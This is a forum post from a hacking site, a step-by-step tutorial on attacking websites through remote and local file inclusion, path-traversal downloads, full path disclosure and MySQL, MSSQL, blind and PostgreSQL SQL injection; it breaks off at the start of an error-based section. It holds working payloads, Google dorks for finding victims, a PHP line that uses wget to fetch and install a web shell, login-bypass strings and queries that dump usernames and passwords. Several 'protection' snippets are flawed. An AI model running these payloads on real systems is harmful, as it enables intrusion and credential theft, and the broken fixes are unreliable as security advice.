Friday, July 25, 2014 Login · Register
    Login
Username

Password


Remember Me

Not a member yet?
Click here to register.

Forgotten your password?
Request a new one here.

 

    Users Online
  • · Members on IRC: 32   
  • · Total Members: 15,627
  • · Newest Member: coolshater
  •  

     

        Related Ads
     

     

     

        Top 10 Forum Posters
    UserPosts
    bluechill1411   
    madf0x1285   
    cruizrisner1061   
    Qwexotic1034   
    Null Set870   
    Override604   
    auditorsec603   
    godofcereal599   
    TurboBorland585   
    Teddy477   
     

        Affiliates




  • iExploit


  • iExploit


  • WeChall





  • Thisislegal.com

  •  

        Related Ads
     

    View Thread
         
    Security Override » The Articles Section » Hacking Tutorials
    HQ Guide - Web-Hacking Methods Tutorial
    Register FAQ Members List Today's Posts Search

    Print Thread
    do you like this ?
    Yes Yes 100%[24 Votes] No No 0%[0 Votes]
    Total Votes : 24
    02-12-2014 07:58 AM HQ Guide - Web-Hacking Methods Tutorial
    Hello Hackers !

    This is a tutorial about web-hacking methods that I and many other hackers have collected.
    I thought that many people would learn a lot from this here.

    Guide content:

    [I] - Remote file inclusion
    [1] RFI?
    [2] Vulnerable script
    [3] Exploiting vulnerability
    [4] Null byte bypass
    [5] Protection script

    [II] Local file inclusion
    [1] LFI?
    [2] Finding vulnerable sites
    [3] Checking site vulnerability
    [4] Proc/self/environ
    [5] Shell uploading

    [III] Local file download
    [1] LFD?
    [2] Vulnerable script
    [3] Vulnerability check
    [4] Exploiting vulnerability
    [5] Protection script

    [IV] Full path disclosure

    [V] MYSQL Injection
    [1] Dorks
    [2] Loging

    [V] SQL Injection - with load file
    [1] SQL Injection?
    [2] Finding vulnerable sites
    [3] Site vulnerability check
    [4] Finding number of columns
    [5] Finding vulnerable columns
    [6] Finding database version
    [7] Finding table name
    [8] Finding column name
    [9] Taking data from columns
    [10] Filter bypassing
    [11] Site protection from SQL Injection

    [VI] MSSQL Injection
    [1] Finding number of columns
    [2] Finding database version
    [3] Finding table name
    [4] Finding column name
    [5] Taking data from columns

    [VII] Blind SQL Injection
    [1] Blind SQL Injection?
    [2] Site vulnerability check
    [3] Finding database version
    [4] MYSQL user
    [5] Finding table name
    [6] Finding column name
    [7] Taking data from columns
    [8] Taking data from columns using sqpmap

    [IX] Postgre SQL Injection
    [1] Postgre SQL Injection?
    [2] Finding vulnerable sites
    [3] Site vulnerability check
    [4] Finding number of columns
    [5] Finding vulnerable columns
    [6] Finding database version
    [7] Finding table name
    [8] Finding column name
    [9] Taking data from columns

    [X]Error based Postgre SQL Injection
    [1] Error based Postgre SQL Injection?
    [2] Finding vulnerable sites
    [3] Site vulnerability check
    [4] Finding database version
    [5] Finding table name
    [6] Finding column name
    [7] Taking data from columns

    [XI] SQL Injection on ASPX
    [1] Site vulnerability check
    [2] Finding table name
    [3] Finding column name
    [4] Finding columns in admin table
    [5] Finding username and password

    [XII] Dot net nuke

    [XIII] XSS
    [1] XSS?
    [2] Required stuff
    [3] XSS types
    [4] Testing XSS vulnerability
    [5] Cookie stealing
    [6] Filter bypassing

    [XIV] CRLF
    [1] CRLF?
    [2] Vulnerable places
    [3] Exploiting vulnerability and protection
    [4] Vulnerable script

    [XV] CSRF
    [1] CSRF?
    [2] Vulnerable places
    [3] Exploiting vulnerability

    [XVI] Server Side Includes | Server Side Inclusion
    [1] Introduction Server Side Includes
    [2] SSI creating
    [3] Server Side Inclusion


    END

    So lets get started!

    1) RFI?
    RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method. This file is usually in txt format pages whose content is printed.
    Example:
    Download source  Code
    http://www.site.com/index.php?page=home




    Now a days RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt format.

    2) Vulnerable script

    Download source  Code
    <?php
    $page = $_GET['page'];
    include($page);
    ?>




    3) Exploiting vulnerability
    We have site:
    Download source  Code
    http://www.site.com/index.php?page=home




    Now instead of home we gonna use our shell.
    So we get:
    Download source  Code
    http://www.site.com/index.php?page=www.shell-link.com/shell.txt?




    If site is vulnerable it should show shell with list of files from site you are attacking.

    4) Null byte bypass
    In some scripts there is a weak protection which is gonna include file and add html extension, or some other:
    Download source  Code
    <?php
    $page = $_GET['page'];
    include($page.".html");
    ?>




    In that case we are going to use null byte bypass(%00).
    Everything after %00 would not count and use. We are also using %00 for picture upload bypass as php, but I am not going to talk about it.

    So link should look like this:
    Download source  Code
    http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00




    5) Protection script
    Script should look like this:
    Download source  Code
    <?php
    $page = $_GET['page'];
    include($page);
    ?>




    So we are going to add some stuff to protect it:
    Download source  Code
    <?php
    $page = $_GET['page'];
    if(file_exists("pages/".$page) {
    include($page);
    }
    ?>





    [II] Local file inclusion

    1) LFI?
    LFI can be used on sites like:
    Download source  Code
    http://link.com/index.php?page=




    by adding
    Download source  Code
    ../../../../../../etc/passwd



    (sometimes you have to add %00 on passwd).

    2) Finding vulnerable sites:
    Download source  Code
    index.php?page=
    index.php?option=
    search.php?word=




    3) Checking site vulnerability:
    Find some site and use
    Download source  Code
    ../../../../../../../../../../../etc/passwd



    or
    Download source  Code
    ../../../../../../../../../../../etc/passwd%00




    When you enter this to link you get this:
    Download source  Code
    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false ntp:x:103:106::/home/ntp:/bin/false snmp:x:104:65534::/var/lib/snmp:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin



    which means that site is vulnerable.

    4) proc/self/environ

    Now we want to see if we have access in /proc/self/environ over site so we can upload a shell on the site.

    Instead of etc/passwd%00 we are going to put /proc/self/environ

    If page prints this:
    Download source  Code
    DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc% 2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
    Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv..........




    then proc/self/environ is enabled so we can upload the shell.

    5) Shell uploading

    To upload the shell we need Mozilla Firefox:
    Download source  Code
    http://www.mozilla.com/firefox/




    Add-on Tamper Data:
    Download source  Code
    https://addons.mozilla.org/en-US/firefox/addon/tamper-data/




    Open site etc:
    Download source  Code
    http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ




    Tools > Tamper Data
    click Start Tamper then refresh page and in user agent put next code:
    Download source  Code
    <?system('wget www.link.com/shell.txt -O shell.php');?>




    Click OK. To access shell use:
    Download source  Code
    www.link.com/shell.php




    [III] Local file download

    1) LFD?
    LFD (Local File Download) is vulnerability in script which is used to download files using GET method, but you can also use it with POST method using add-on Tamper Data.
    Download source  Code
    http://site.com/download_file.php?file=notepad.exe




    2) Vulnerable script
    Download source  Code
    <?php
    if(isset($_POST['download'])) {
    $file = $_GET['file'];
    $file_info = pathinfo($file);
    header('Content-type: application/x-'.$file_info['extension']);
    header('Content-Disposition: attachment; filename='.$file_info['basename']);
    header('Content-Length: '.filesize($file));
    readfile($file);
    exit;
    }
    ?>




    3) Vulnerability check

    To check if script is vulnerable we are gonna try to download etc/passwd.
    So instead of:
    Download source  Code
    http://site.com/download_file.php?file=notepad.exe




    We are gonna use:
    Download source  Code
    http://site.com/download_file.php?file=../../../../../../../../../etc/passwd




    If it starts to download and if it open file in text editor it look something like this:
    Download source  Code
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin




    Script is vulnerable!
    NOTE: If it is a windows server use boot.ini instead of etc/passwd.

    4) Exploiting vulnerability

    Now when we know that script is vulnerable, we want to see which files are on host. You can do this on this way:
    Download source  Code
    http://site.com/download_file.php?filel=../




    ../ is gonna back us one directory backward and download file.

    1.1 It is possible when it download file and open in text editor to print file list in directories.
    1.2 or it is either possible to download file but when it is opened in text editor file is empty.

    In case 1.1 we dont have to guess file name and directory and we can download whatever we want.
    In case 1.2 we must guess file name and directory and we can download only files which name we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website Copier).

    5) Protection script

    We have script mentioned at start:
    Download source  Code
    <?php
    if(isset($_POST['download'])) {
    $file = $_GET['file'];
    $file_info = pathinfo($file);
    header('Content-type: application/x-'.$file_info['extension']);
    header('Content-Disposition: attachment; filename='.$file_info['basename']);
    header('Content-Length: '.filesize($file));
    readfile($file);
    exit;
    }
    ?>




    by adding if(file_exists("download/".$file) we are gonna secure script.
    So it should look like:
    Download source  Code
    <?php
    if(isset($_POST['download'])) {
    $file = $_GET['file'];
    $file_info = pathinfo($file);
    if(file_exists("download/".$file)) {
    header('Content-type: application/x-'.$file_info['extension']);
    header('Content-Disposition: attachment; filename='.$file_info['basename']);
    header('Content-Length: '.filesize($file));
    readfile($file);
    exit;
    }




    [IV] Full path disclosure

    This method let you over errors in file or over errors made by programmers to let you see which files are in which directories, over it you can't directly hack site, it just let you help while hacking.

    It is useful because it can help you in faster and easier hacking, also it can help you with Local File Inclusion (LFI), when folder name is changed, or some other file. You can findout using FPD.

    There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important.

    1st is over array, by adding square brackets on link like this one:
    Download source  Code
    index.php?page=home




    To finish vulnerability attack is to add [] on destined place:
    Download source  Code
    index.php?page[]=home.




    That will give you error like this:
    Download source  Code
    Warning: include(blah/errors.php) [function.include]: failed to open stream: No such file or directory /home/insekure/public_html/index.php on line 211




    From this you can see on site is it exists directory blah.

    2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java-injection, by adding java code on site you will get error.

    This is a javascript code:
    Download source  Code
    javascript:void(document.cookie='PHPSESSID=');




    add that in your address bar and hit enter, now when page is refreshed you will get this error:
    Download source  Code
    Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/thems/errors.php on line 58




    then try to open directory thems on site, that should list you files in that directory.

    Protection:
    Most simple way to protect from this attacks is to turn-off error reporting.
    edit or add:
    Download source  Code
    error_reporting(0);




    [V] MYSQL Injection

    1) Dorks
    Download source  Code
    inurl:admin.asp
    inurl:login/admin.asp
    inurl:admin/login.asp
    inurl:adminlogin.asp
    inurl:adminhome.asp
    inurl:admin_login.asp
    inurl:administrator_login.asp




    I am going to use:
    Download source  Code
    http://site.com/Admin_Login.asp




    2) Logging

    Now you can find some site over these dorks and try to log in with:
    Username: Admin
    Password: password' or 1=1--

    Instead of password' or 1=1 you can use some of these:
    Download source  Code
    'or'1'='1
    ' or '1'='1
    ' or 'x'='x
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or a=a--
    " or "a"="a
    'or'1=1'




    password' or 1=1 will the confuse server and will let you log in.
    So if you are able to log in, site is vulnerable and you are going to be able to use admin panel.

    [VI] SQL Injection

    1) SQL Injection?
    SQL Injection is type of web attack. Attacker use hole in script to take all data from database. Vulnerable sites are in format:
    Download source  Code
    http://www.link.com/index.php?id=




    You can put anything else instead of index.

    2) Finding vulnerable sites:
    Best way to find vulnerable site is by using Google. We use these dorks to find sites:
    Download source  Code
    inurl:faq.php?id=
    inurl:event.php?id=
    inurl:index.php?id=




    3) Site vulnerability check:
    There are 2 ways to check if site is vulnerable.

    1st way, we got link:
    Download source  Code
    http://site.com/book.php?id=141




    we are gonna add only ' at end of link so we get this link:
    Download source  Code
    http://site.com/book.php?id=141'




    2nd way, we got link:
    Download source  Code
    http://site.com/book.php?id=141




    we are going to add +and+1=2-- at end of link so we get:
    Download source  Code
    http://site.com/book.php?id=141+and+1=2--




    If some part of page disappear (picture, text or something) or any error like (You have an error in your SQL syntax) site is vulnerable.

    4) Finding number of columns
    We can do it by using function order by, on link:
    Download source  Code
    [http://site.com/book.php?id=141




    adding +order+by+5--
    Download source  Code
    http://site.com/book.php?id=141+order+by+5--




    If page is opens normal there is more then 5 columns. Lets try with 10.
    Download source  Code
    http://site.com/book.php?id=141+order+by+10--




    Now some part of site disappeared, which means that there's more then 5 and less then 10 columns. Lets try 7.
    Download source  Code
    http://site.com/book.php?id=141+order+by+7--




    Page is opened normally which means that there is more then 7 and less then 10 columns. Lets try 8.
    Download source  Code
    http://site.com/book.php?id=141+order+by+7--




    on column 8 part of site disappear which means that there is 7 columns.

    5) Finding vulnerable columns

    Finding vulnerable columns is done with function union select all on link (in this case) we are going to add +union+select+all+1,2,3,4,5,6,7--
    Download source  Code
    http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--




    It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be taken from any column. We are going to take from second column.

    6) Finding database version

    As I said we are gonna take data from second column. Instead of number 2 we are going to put version() or @@version
    Download source  Code
    http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--




    on page where number 2 was, it will show database version.
    If database version is 4 we have to guess name of table and column, but if database version is 5 we have to guess database version.

    We have version 5.0.51a-24+lenny5 which means that we don't have to guess name of table and column.

    7) Finding table names

    If database version is 4 you wont be able to find name of table and column, you have to guess their names. If database version is skip this step.
    Names of some possible tables:
    Download source  Code
    admin
    admins
    user
    users
    member
    members




    Names of some possible columns:
    Download source  Code
    username
    uname
    un
    user
    name
    nick
    password
    pw
    pwd
    passwd




    If database version is 5 we can take name of table by doing next step: instead of number 2 we going to put group_concat(table_name) and after number of last column +from+information_schema.tables+where+table_schema=database()--

    So we get this link:
    Download source  Code
    http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schem&#8203;a.tables+where+table_schema=database()--




    Instead of number 2 it showed name of table, in this case date, book, users. We gonna take columns from users table.

    8) Finding column name

    We found table name that we want and now from that we want to take columns. Instead of group_concat(table_name) we are going to put group_concat(column_name) and instead of +from+information_schema.tables+where+table_schema=database()-- we are going to put +from+information_schema.columns+where+table_name=hex-- instead of hex we have to encrypt in hex name of table.

    Go to:
    Download source  Code
    http://www.string-functions.com/string-hex.aspx




    write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now can see the columns:
    Download source  Code
    http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_sche&#8203;ma.columns+where+table_name=0x7573657273--




    9) Taking data from columns

    We got: id, name, surname, username, password, level.
    We need only username and password.

    Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a stands for to make space between user and pw. Instead of from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--

    and we have link:
    Download source  Code
    http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users&#8203;--




    and result e.g.:
    Download source  Code
    sebrezovski:1533562
    seratum:seratum
    coach:53.21.1985.
    biga:biga




    which is users and passwords from this site.

    10) Filter bypassing

    In case when you write union+select+all says "not accessible" then change it to UnIoN+sElEcT+aLl
    On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish */)
    On some sites there is also restricted database version so you can use unhex(hex(version()))

    11) Site protection from SQL Injection

    Just put this code in your script:
    Download source  Code
    if(!is_numeric($_GET['id']))
    {
    echo 'It is gonna write text when some try to add /' or and+1=2';
    }




    SQL Injection - Load File

    You found site with SQL vulnerability, now you can try to access table mysql.user and file privileges.

    To so which is user and do we have user privileges we are adding 'user' instead of a vulnerable column and at end of URL adding '+from+mysql.user--'.

    It should look like this:
    Download source  Code
    http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--





    If you get username, it means that you have access to mysql.user table and you can continue with this tut.

    Now to see if we have file privileges we have to instead of 'user' add 'concat(user,0x3a,file_priv)' and of course '+from+mysql.user--'

    Now when on page usernames and file priv. are listed you must find username which was written at start, when you was writing 'user' in column, when you find it and if besides him shows 'Y' which is Yes. You have privileges.

    Load File:

    All we have to do is to write on vulnerable column load_file('FILE NAME').
    We gonna try with /etc/passwd, so we type in vulnerable column 'load_file('/etc/passwd').

    Which looks like this:
    Download source  Code
    http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passwd'),4--




    If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file name.

    Hex e.g.
    If we convert file name in Hex, before file name we will add '0x'
    Download source  Code
    http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632f706173737764),4+from+m&#8203;ysql.user--




    Hex code '2f6574632f706173737764' works for '/etc/passwd'.

    It is recommended for Hex:
    Download source  Code
    www.string-functions.com/string-hex.aspx




    If you decide to convert file in Char then add 'load_file(char(converted file to char))'

    Which looks like:
    Download source  Code
    http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101,116,99,47,112,97,115,1&#8203;15,119,100),4--




    Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd'

    Char converter:
    Download source  Code
    http://pookey.co.uk/binary.php




    [VII] MSSQL Injection

    1) Finding number of columns

    I will use:
    Download source  Code
    http://www.site.com/sr/page/member.asp?id=234




    To find column number we gonna use order by function. We will add +order+by+5-- at end of link.
    Download source  Code
    http://www.site.com/sr/page/member.asp?id=234+order+by+5--




    So we will get this error:
    Download source  Code
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out of range of the number of items in the select list.

    /sr/page/member.asp, line 38




    which means that there is less then 5 columns, lets try with 4. We get same error, so we gonna try with 3 and we get next error:
    Download source  Code
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.

    /sr/page/member.asp, line 44




    Which means that there is 3 columns.

    2) Finding database version

    To find database version we are using @@version.
    Download source  Code
    http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--




    and we get:
    Download source  Code
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

    /sr/page/member.asp, line 38





    and from here we can see database version.

    3) Finding table name

    With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1.
    Download source  Code
    http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables&#8203;--




    and we get:
    Download source  Code
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Country' to a column of data type int.

    /sr/page/member.asp, line 38




    and we can see that we have a table called 'Country'.

    Now we have to find other tables. We are going to use not+in function. So we have link:
    Download source  Code
    http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables&#8203;+where+table_name+not+in('Country')--




    and we get:
    Download source  Code
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin' to a column of data type int.

    /sr/page/member.asp, line 38




    and from here we can see that we have a Admin table.

    4) Finding column name

    It is same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this case we will use where+table_name='Admin'--. So we have link:
    Download source  Code
    http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.colum&#8203;ns+where+table_name='Admin'--




    and we have error:
    Download source  Code
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USERNAME' to a column of data type int.

    /sr/page/member.asp, line 38




    From here we can see that we have column USERNAME. Now we need rest of the columns so we gonna use again not+in function.
    Download source  Code
    http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.colum&#8203;ns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--




    and we get:
    Download source  Code
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'PASSWD' to a column of data type int.

    /sr/page/member.asp, line 38




    So columns is PASSWD.

    5) Taking data from columns

    Now we have to put name of table instead of table_name and everything after from we are entering the name of the table.
    Download source  Code
    http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--




    We get username OjuZwqAul.

    It is same for password:
    Download source  Code
    http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--




    We get password M7sWt2!2uq.

    [VIII] Blind SQL Injection

    1) Blind SQL Injection?

    Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not writing any errors, any table and column names or column content. So that is why it is called Blind SQL. You are just messing with part of site disappearing - image, text, etc... In Blind Injection we don't use --i/* */.

    2) Site vulnerability check

    We have link:
    Download source  Code
    http://www.site.com/index.php?id=1




    We will add and 1=2
    Download source  Code
    http://www.site.com/index.php?id=1+and+1=2




    If any part of page disappear, it means that site is vulnerable.

    3) Finding database version

    As we said already in this method nothing is gonna be showed, so we gonna say that database version is 4. If part of site disappear it means that version is not 4, but if everything on page stay as it should it means that version is 4. We gonna use function @@version.
    Download source  Code
    http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4




    If page is loaded as it should then version is 4, if not, then we will try:
    Download source  Code
    http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5




    4) MYSQL user

    First we will check are we able to use select because it is blocked sometimes.
    Download source  Code
    http://www.site.com/index.php?id=1+and+(select+1)=1




    If page is loaded normally we can use select, but if not then we can't use it. Now we will check do we have MYSQL user access.
    Download source  Code
    http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysq.user+limit+0,1)=1




    Same as everything else, if page is loaded normally we have access to mysql.user, if not then we don't have. mysql.user is useful to get hash password or use load_file() and OUTFILE.

    5) Finding table name

    To find table names all we have to do is guess. First we gonna find table name then after column name from table.
    We have link and we are gonna try to get names of different tables. If page is loaded normally it means that table name is there and exists.
    Download source  Code
    http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1




    Our main objective is to to find data from admin table, we can also use:
    Download source  Code
    admin
    administrator
    member
    login
    members
    adm
    user
    users
    tbl_admin




    6) Finding column name

    Now when we found name of table we wanted it is time to find column name. We doing same as for table. There is name matching, if page is loaded normally then column exists. We need logging data so commonly columns gonna be:
    Download source  Code
    username
    admin
    admin_username
    uname
    user
    nick
    password
    pwrod
    admin_password
    pw
    pass




    Link that we use for columns is:
    Download source  Code
    http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone),1,1)from+ime_tabele+li&#8203;mit+0,1)=1




    7) Taking data from columns

    In whole Blind SQL this gonna be most bored and longest part. Here we gonna need ASCII table.
    Download source  Code
    http://www.asciitable.com/




    We will look only for DEC and CHR ASCII tables. First we gonna get username, getting letter by letter. So we need to guess DEC for some letter, e.g. for A it is 65.
    We have link:
    Download source  Code
    http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+&#8203;limit+0,1)1,1))>from DEC number




    If page load normally we found are real letter for username. To find our second letter change +limit+0,1 to +limit+1,1.
    So now we are guessing second letter... It is same for password... So after long long time we get username and password. If there is more users and if you want to get their passwords too you will have to add where function.
    So it should look like:
    Download source  Code
    http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+&#8203;where+column_name=something+limit+0,1)1,1))>from DEC letter




    To use where for second column_name we usually using id, but we can also use other stuff. e.g. for id:
    Download source  Code
    http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+&#8203;where+id=1+limit+0,1)1,1))>from DEC letter




    8) Taking data from columns using sqlmap

    As you noticed already that you need a lot of time to get data from columns I would suggest you to use sqlmap.
    Download:
    Download source  Code
    http://sqlmap.org/




    Python download:
    Download source  Code
    http://www.python.org/download/




    Now we have to find directory where sqlmap is located.
    Start>run>cmd and find sqlmap directory using cd function.
    Function to start sqlmap for getting data with Blind SQL Injection for windows is:
    Download source  Code
    sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"




    NOTE: for unix put python before sqlmal.py
    So it should look like:
    Download source  Code
    python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"




    If there is more users as I said then use id:
    Download source  Code
    sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)"




    After -u you put link.
    After -p you put parameter which is vulnerable (in our case id).
    -a we are using for some random user agen-t from txt/user-agents.txt
    -v1 is verbose
    After --string stavljamo something that sqlmap is gonna recognize that he found letter (some part of text who dissapear if case is false).
    -e is command that we want to execute. In our case this one:

    Download source  Code
    SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where userid=1




    [IX] Postgre SQL Injection

    1) Postgre SQL Injection?

    Postgre SQL Injection is almost same as SQL Injection. Difference is in Postgre base, not MySQL. It is a bit complicated attack then usually SQL Injection. There is some other functions that we will use, you will see.

    1) Finding vulnerable sites

    Finding site vulnerability is same as usual SQL Injection, which means that we can use Google dorks.
    Here is some:
    Download source  Code
    inurl:faq.php?id=
    inurl:event.php?id=
    inurl:index.php?id=




    3) Site vulnerability check

    You found site that may be vulnerable. To check if site is vulnerable we will add ' at end of link.
    Download source  Code
    http://www.link.com/page.php?page=1'




    So if on page we get:
    Download source  Code
    Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near




    or some part of page disappear then site is vulnerable.

    4) Finding number of columns

    So we know that site is vulnerable, now we need to find column number. We will do it with union function this time.
    Our link:
    Download source  Code
    http://www.link.com/page.php?page=1+union+select+all+null--+-




    If page is loaded normally that means that there is more columns.

    Download source  Code
    http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from dual--




    We are adding null all the time till we get error. If we get error with 7 null, it means that we have 6 columns, which means 6 nulls.

    5) Finding vulnerable columns

    It is just so easy to find column vulnerability. Null = 0, which means that everything you put instead of certain null, if nothing happens it means that columns is not usable. That is how we gonna find vulnerable column.
    So:
    Download source  Code
    http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-




    If there is nothing listed, it means that column is not usable we will move on next, and this one back to null.

    6) Finding database version

    We are doing this with version() function.
    Link will show us the version:
    Download source  Code
    http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-




    we will get something like:
    Download source  Code
    PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit




    7) Finding table name

    Same as usual SQL Injection, only diff. is that instead of column number we have null.
    So it should look like:
    Download source  Code
    http://www.link.com/page.php?page=1+union+select+all table_name,null,null,null+from+information_schema.tables--+-




    We will get table names also the columns from tables.

    8) Finding column name

    It is also easy, and there is no big difference.
    This is how it should look like:
    Download source  Code
    http://www.link.com/page.php?page=1+union+select+all column_name,null,null,null+from+information_schema.columns+where+table_name=user&#8203;s--+-




    Sometimes this wont work so we need to convert = from ascii in decimal.
    You can use this site:
    Download source  Code
    http://easycalculation.com/ascii-hex.php




    So we have link:
    Download source  Code
    http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_sch&#8203;ema.columns+where+table_name||CHR(61)||users--+-




    9) Taking data from columns

    Also almost same as usual SQL Injection:
    Download source  Code
    http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password+from+users--+-




    [X]Error based Postgre SQL Injection


    1) Error based Postgre SQL Injection?

